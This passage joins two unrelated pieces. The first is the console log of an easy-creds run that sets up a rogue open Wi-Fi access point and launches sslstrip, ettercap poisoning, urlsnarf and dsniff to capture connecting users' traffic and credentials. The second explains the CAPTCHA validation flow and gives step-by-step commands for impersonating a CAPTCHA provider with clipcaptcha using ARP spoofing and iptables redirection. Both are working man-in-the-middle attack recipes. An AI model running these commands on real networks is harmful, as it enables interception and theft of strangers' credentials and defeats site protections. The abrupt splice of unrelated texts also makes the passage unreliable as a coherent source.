inet6 addr: xxxx::xxx:xxxx:xxxx:xxx/xx Scope:Link
mon0 Link encap:UNSPEC HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00
[+] Enter tunnel interface, example at0: at0
[+] Do you have a populated dhcpd.conf file to use? (y/n) n
[+]Create dhcpd conf file: /etc/dhcp3/dhcpd-ec.conf
[+]Network range for your tunneled interface, example 10.0.0.0/24: 192.168.1.0/24
[+] Enter the IP address for the DNS server, example 8.8.8.8: 8.8.8.8
Creating a dhcpd.conf to assign addresses to clients that connect to us.
------/etc/dhcp3/dhcpd-ec.conf-----------
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.100 192.168.1.200;
option domain-name-servers 8.8.8.8;
option routers 192.168.1.1;
option broadcast-address 192.168.1.255;
default-lease-time 600;
max-lease-time 7200;
}
[+] Launching Airbase with your settings.
[*] airbase-ng -P -e Freeeeeeeee -c 6 mon0 &
[+] Configuring dhcp tunneled interface.
[?] TUNIFACE: at0
[?] ATIP: 192.168.1.1
[?] ATSUB: 255.255.255.0
[?] ATNET: 192.168.1.0
[*] ifconfig at0 up
[*] ifconfig at0 192.168.1.1 netmask 255.255.255.0
[*] ifconfig at0 mtu 1400
[*] route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 dev at0
[+] Setting up iptables to handle traffic seen by the tunneled interface.
[*] iptables --flush
[*] iptables --table nat --flush
[*] iptables --delete-chain
[*] iptables --table nat --delete-chain
[*] iptables -P FORWARD ACCEPT
[*] iptables --append FORWARD --in-interface at0 -j ACCEPT
[*] iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
[*] iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
[+] Launching Tail.
[*] tail -f /var/log/messages &
[+] DHCP server starting on tunneled interface.
[*] dhcpd3 -q -cf /etc/dhcp3/dhcpd-ec.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
[*] ifconfig | grep Link| grep -v lo
at0 Link encap:Ethernet HWaddr 7c:dd:90:42:94:55
inet6 addr: fe80::7edd:90ff:fe42:9455/64 Scope:Link
eth0 Link encap:Ethernet HWaddr 08:00:27:c9:07:55
inet6 addr: fe80::a00:27ff:fec9:755/64 Scope:Link
mon0 Link encap:UNSPEC HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00
[+] Creating folder for attack output ...
[*] mkdir -p //root/Desktop//easy-creds-2014-01-05-0924
[+] Launching SSLStrip.
[*] python /pentest/web/sslstrip/sslstrip.py -pfk -w //root/Desktop//easy-creds-2014-01-05-0924/sslstrip2014-01-05-0925.log &
[+] Launching ettercap, poisoning specified hosts.
[*] ettercap -a /etc/etter.conf -T -q -l //root/Desktop//easy-creds-2014-01-05-0924/ettercap2014-01-05-0925 -i at0 // // &
[+] Configuring IP forwarding.
[*] echo 1 > /proc/sys/net/ipv4/ip_forward
[+] Launching URLSnarf.
[*] urlsnarf -i at0&
Launching Dsniff.
[*] dsniff -m -i at0 -w //root/Desktop//easy-creds-2014-01-05-0924/dsniff2014-01-05-0925.log &
[^] Time to make it rain... Enjoy!
CAPTCHA providers generally offer both CAPTCHA generation and validation services. To use these services, the subscribing websites either use the existing libraries and plugins or write their own. A typical user interaction with a web application that relies on a CAPTCHA provider is summarized below:
1. A user requests a page that requires CAPTCHA validation.
2. The returned page contains an embedded <img> (or <script>) tag to retrieve the CAPTCHA
image from the CAPTCHA provider.
3. Upon parsing the embedded tags, the browser retrieves a CAPTCHA from the CAPTCHA provider and displays it to the user.
4. The user fills in the form fields, enters the CAPTCHA solution, and submits the page to the web application.
5. The web application then submits the CAPTCHA solution to the CAPTCHA provider for verification.
6. The CAPTCHA provider responds to the web application with success or failure message.
7. Based on CAPTCHA provider’s response, the web application allows or denies the request.
Sample impersonation
The steps below show how to run clipcaptcha as CAPCHA provider:
• Enable forwarding mode on your machine. (echo “1” > /proc/sys/net/ipv4/ip_forward)
• Set up iptables to redirect HTTP traffic to clipcaptcha. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listeningPort>)
• Run arpspoof to redirect the traffic to your machine. (arpspoof -i <interface> -t
<targetIP> <gatewayIP>)
• Run clipcaptcha in one of its mode of operation. (clipcaptcha.py <mode> -l <listeningPort>)
Once clipcaptcha instance starts running, all CAPTCHA validation requests will be administered
by clipcaptcha.